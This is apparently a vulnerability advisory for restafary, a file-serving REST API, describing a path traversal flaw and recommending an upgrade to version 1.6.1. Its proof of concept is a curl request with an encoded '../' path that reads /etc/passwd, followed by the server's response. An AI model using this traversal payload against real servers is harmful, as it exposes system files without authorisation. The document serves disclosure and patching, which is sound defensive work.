- restafary is a REpresentful State Transfer API for Creating, Reading, Using, Deleting files on a server from the web
- restafary is able to set up a root path, which should only allow it to run inside of that root path it specified.
- An attacker is able to provide a specifically crafted path to access files outside of this specified root path.
- Note: this is only possible if the attacker has access to the restafary application.
Proof of Concept
curl -i -s -k -X 'GET' -H 'Authorization: Basic YWRtaW46cGFzc3dvcmQ=' 'http://localhost:8000/api/v1/fs/..%2f..%2fetc/passwd' HTTP/1.1 200 OK X-Powered-By: Express Access-Control-Allow-Origin: * Content-Type: text/plain; charset=UTF-8 Vary: Accept-Encoding Accept-Ranges: bytes Last-Modified: Sun Jul 12 2015 22:38:08 GMT-0700 (PDT) Content-Length: 5581 Cache-Control: max-age=0 Date: Fri, 25 Mar 2016 17:30:29 GMT Connection: keep-alive ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh
Upgrade to restafary version 1.6.1 or greater.